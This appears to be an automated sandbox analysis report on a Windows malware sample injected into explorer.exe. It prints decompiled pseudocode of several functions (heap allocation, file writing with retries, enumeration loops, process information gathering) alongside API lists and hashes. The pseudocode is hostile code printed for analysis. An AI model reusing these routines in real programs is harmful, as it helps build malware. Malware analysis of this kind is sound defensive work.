                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                            • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
                            • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                            • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008F9BF, Relevance: 1.4, APIs: 1, Instructions: 119sleepCOMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E0008F9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0x9e654; // 0xc2fd20
				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0x9e654; // 0xc2fd20
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000886E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E0008109A(_t63, 0x34a);
						_t66 =  *0x9e688; // 0xb0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0x9e688; // 0xb0000
						_push(_t67);
						_v20 = E000892E5(_t39 + 0x1020);
						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000885D5( &_v24);
						E000885D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0x9e654; // 0xc2fd20
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E0008861A( &_v16, _t69);
						E0008861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0x9e654; // 0xc2fd20
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0x9e688; // 0xb0000
						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0x9e654; // 0xc2fd20
							continue;
						}
						break;
					}
					E0008861A( &_v12, 0);
				}
				return 0;
			}

























                            0x0008f9c5
                            0x0008f9cd
                            0x0008f9d2
                            0x0008f9d8
                            0x0008f9de
                            0x0008f9f1
                            0x0008f9fb
                            0x0008fa05
                            0x0008fa08
                            0x0008fa0d
                            0x0008fa23
                            0x0008fa27
                            0x0008fa2c
                            0x0008fa2d
                            0x0008fa2e
                            0x0008fa33
                            0x0008fa36
                            0x0008fa37
                            0x0008fa38
                            0x0008fa3d
                            0x0008fa4c
                            0x0008fa51
                            0x0008fa56
                            0x0008fa5d
                            0x0008fa66
                            0x0008fa6b
                            0x0008fa6e
                            0x0008fa71
                            0x0008fa76
                            0x0008fa7c
                            0x0008fa81
                            0x0008fa86
                            0x0008fa89
                            0x0008fa9c
                            0x0008faa1
                            0x0008faa4
                            0x0008faa4
                            0x0008faac
                            0x0008fab7
                            0x0008fabc
                            0x0008fabf
                            0x0008fac2
                            0x0008fac2
                            0x0008fac8
                            0x0008faca
                            0x0008face
                            0x0008fad9
                            0x0008fade
                            0x0008fae3
                            0x00000000
                            0x00000000
                            0x0008faec
                            0x0008faf2
                            0x0008faf9
                            0x0008fafb
                            0x0008fafe
                            0x00000000
                            0x0008fafe
                            0x00000000
                            0x0008faf9
                            0x0008fb0b
                            0x0008fb14
                            0x0008fb18

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapSleep
                            • String ID:
                            • API String ID: 4201116106-0
                            • Opcode ID: 1f9757d0e137bd40863a7303ae008b135da7446a92f1e42c8074acf2507c4f46
                            • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
                            • Opcode Fuzzy Hash: 1f9757d0e137bd40863a7303ae008b135da7446a92f1e42c8074acf2507c4f46
                            • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008896F, Relevance: 1.4, APIs: 1, Instructions: 107stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 97%
                            			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E00088604(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E00088604(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E000887EA(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E0008861A( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0x9e684; // 0xc2f8f0
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E0008861A(_t73, 0);
						}
						E0008861A( &_v20, 0);
						goto L1;
					}
					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0x9e684; // 0xc2f8f0
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E0008861A( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}
















                            0x00088975
                            0x0008897c
                            0x0008897e
                            0x00088986
                            0x00088988
                            0x00088990
                            0x00088992
                            0x00088995
                            0x00088998
                            0x000889ac
                            0x000889b3
                            0x000889b9
                            0x000889c2
                            0x00088a1a
                            0x00088a1f
                            0x00088a28
                            0x00088a75
                            0x00088a78
                            0x00088a80
                            0x00088a84
                            0x00088a84
                            0x00088a89
                            0x00000000
                            0x00088a89
                            0x00088a2a
                            0x00088a2c
                            0x00088a34
                            0x00088a3a
                            0x00088a3b
                            0x00088a3b
                            0x00088a43
                            0x00088a46
                            0x00088a4b
                            0x00088a4b
                            0x00088a4e
                            0x00088a57
                            0x00088a5c
                            0x00088a62
                            0x00088a69
                            0x00000000
                            0x00088a6f
                            0x000889cb
                            0x000889d0
                            0x000889d2
                            0x000889d9
                            0x00000000
                            0x00000000
                            0x000889ee
                            0x00000000
                            0x000889f0
                            0x000889f0
                            0x000889fb
                            0x000889fe
                            0x00088a0b
                            0x00000000
                            0x00088a11
                            0x000889ee
                            0x0008899a
                            0x00000000

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrcpyn
                            • String ID:
                            • API String ID: 680773602-0
                            • Opcode ID: 2ed121c04ca1c5a63efc21f18d22bacd3c34627e10a5a3f8a7b673c02318cc9d
                            • Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
                            • Opcode Fuzzy Hash: 2ed121c04ca1c5a63efc21f18d22bacd3c34627e10a5a3f8a7b673c02318cc9d
                            • Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008E2C6, Relevance: 1.3, APIs: 1, Instructions: 92sleepCOMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E0008E2C6(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0x9e6b4; // 0xc2fa98, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0x9e6b4; // 0xc2fa98
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0x9e68c; // 0xc2fab8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E00088604(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0x9e68c; // 0xc2fab8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}





















                            0x0008e2c6
                            0x0008e2d9
                            0x0008e2e0
                            0x0008e2e9
                            0x0008e2f1
                            0x0008e2f7
                            0x0008e2fc
                            0x0008e307
                            0x0008e30c
                            0x0008e3a5
                            0x0008e3a5
                            0x0008e3ad
                            0x00000000
                            0x0008e3b2
                            0x0008e313
                            0x0008e316
                            0x0008e31d
                            0x0008e32d
                            0x0008e333
                            0x0008e343
                            0x0008e348
                            0x0008e34d
                            0x0008e354
                            0x0008e358
                            0x0008e35f
                            0x0008e363
                            0x0008e367
                            0x0008e368
                            0x0008e36b
                            0x0008e370
                            0x0008e379
                            0x0008e385
                            0x0008e38f
                            0x0008e394
                            0x0008e394
                            0x0008e379
                            0x0008e39a
                            0x0008e39b
                            0x00000000
                            0x0008e3a4
                            0x00000000

                            APIs
                            • Sleep.KERNELBASE(0000000A), ref: 0008E394
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                            • Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
                            • Opcode Fuzzy Hash: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                            • Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A3ED, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}













                            0x0008a3ed
                            0x0008a3f6
                            0x0008a3f8
                            0x0008a3fa
                            0x0008a3fe
                            0x0008a400
                            0x0008a408
                            0x0008a40f
                            0x0008a418
                            0x0008a41d
                            0x0008a422
                            0x0008a446
                            0x0008a44b
                            0x0008a451
                            0x0008a45d
                            0x0008a462
                            0x0008a424
                            0x0008a42d
                            0x0008a443
                            0x00000000
                            0x0008a42f
                            0x0008a43b
                            0x0008a440
                            0x0008a42d
                            0x0008a422
                            0x0008a465
                            0x0008a466
                            0x0008a400
                            0x0008a470

                            APIs
                              • Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782
                            • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                            • Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
                            • Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                            • Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00085D7D, Relevance: 1.3, APIs: 1, Instructions: 49stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 95%
                            			E00085D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0x9e684; // 0xc2f8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0x9e688; // 0xb0000
					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0x9e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00089EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0x9e688; // 0xb0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0x9e684; // 0xc2f8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}















                            0x00085d80
                            0x00085d95
                            0x00085d9e
                            0x00085da7
                            0x00085da9
                            0x00085db1
                            0x00085dc1
                            0x00085dcf
                            0x00085dd4
                            0x00085dd9
                            0x00085ddb
                            0x00085ddd
                            0x00085de2
                            0x00085de4
                            0x00085dff
                            0x00085dff
                            0x00085de6
                            0x00085de7
                            0x00085df2
                            0x00085dfa
                            0x00085dfc
                            0x00085dfc
                            0x00085de4
                            0x00085e01
                            0x00085db3
                            0x00085db4
                            0x00085db9
                            0x00085dbe
                            0x00085dbe
                            0x00085e05

                            APIs
                            • lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcmpi
                            • String ID:
                            • API String ID: 1586166983-0
                            • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                            • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
                            • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                            • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008BA05, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008BA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0x9e68c; // 0xc2fab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E0008B998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0x9e684; // 0xc2f8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}












                            0x0008ba0a
                            0x0008ba12
                            0x0008ba1a
                            0x0008ba1f
                            0x0008ba29
                            0x0008ba32
                            0x0008ba37
                            0x0008ba3c
                            0x0008ba5a
                            0x0008ba5d
                            0x0008ba3e
                            0x0008ba41
                            0x0008ba43
                            0x0008ba4b
                            0x0008ba4b
                            0x0008ba4e
                            0x0008ba4e
                            0x0008ba61
                            0x0008ba22
                            0x0008ba22
                            0x0008ba22

                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                            • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
                            • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                            • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00085CEC, Relevance: 1.3, APIs: 1, Instructions: 38COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0x9e688; // 0xb0000
				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000885EF();
				E00088F78();
				 *0x9e780 = 0;
				 *0x9e784 = 0;
				 *0x9e77c = 0;
				E00085EB6(); // executed
				E0008CF84(_t24);
				_t14 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E0008B337( &_v44);
				memset( &_v44, 0, 0x27);
				E00085C26( &_v44, __fp0);
				_t21 =  *0x9e684; // 0xc2f8f0
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}











                            0x00085cec
                            0x00085cec
                            0x00085cef
                            0x00085cfe
                            0x00085d03
                            0x00085d08
                            0x00085d0f
                            0x00085d15
                            0x00085d1b
                            0x00085d21
                            0x00085d26
                            0x00085d2b
                            0x00085d33
                            0x00085d3d
                            0x00085d4b
                            0x00085d53
                            0x00085d5f
                            0x00085d67
                            0x00085d6c
                            0x00085d72
                            0x00085d7c

                            APIs
                              • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                              • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                              • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                              • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
                              • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                              • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                              • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                            • memset.MSVCRT ref: 00085D5F
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
                            • String ID:
                            • API String ID: 4245722550-0
                            • Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                            • Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
                            • Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                            • Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008861A, Relevance: 1.3, APIs: 1, Instructions: 33memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E0008C392(_t9);
						}
					} else {
						_t4 = E0008C379(_t9);
					}
					E0008874F(_t9, 0, _t4);
					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
				}
				return _t3;
			}






                            0x0008861d
                            0x00088622
                            0x00088668
                            0x00088668
                            0x00088625
                            0x00088629
                            0x0008862b
                            0x0008862e
                            0x00088634
                            0x00088642
                            0x00088646
                            0x00088646
                            0x00088636
                            0x00088637
                            0x0008863c
                            0x0008864f
                            0x00088660
                            0x00088660
                            0x00000000

                            APIs
                            • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                            • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
                            • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                            • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008A77D, Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E0008A5F7(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E0008A65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}








                            0x0008a786
                            0x0008a787
                            0x0008a78c
                            0x0008a790
                            0x0008a79f
                            0x0008a7a7
                            0x0008a7b4
                            0x00000000
                            0x0008a7b7
                            0x0008a7ab
                            0x00000000
                            0x0008a7ab
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                            • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
                            • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                            • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000898A6, Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E000898A6(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E0008A4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
					CloseHandle( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E0008984A(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}




                            0x000898aa
                            0x000898bc
                            0x000898ca
                            0x000898d7
                            0x000898da
                            0x000898e1
                            0x000898e1
                            0x00000000
                            0x000898e6
                            0x00000000

                            APIs
                            • CloseHandle.KERNELBASE(?), ref: 000898CA
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
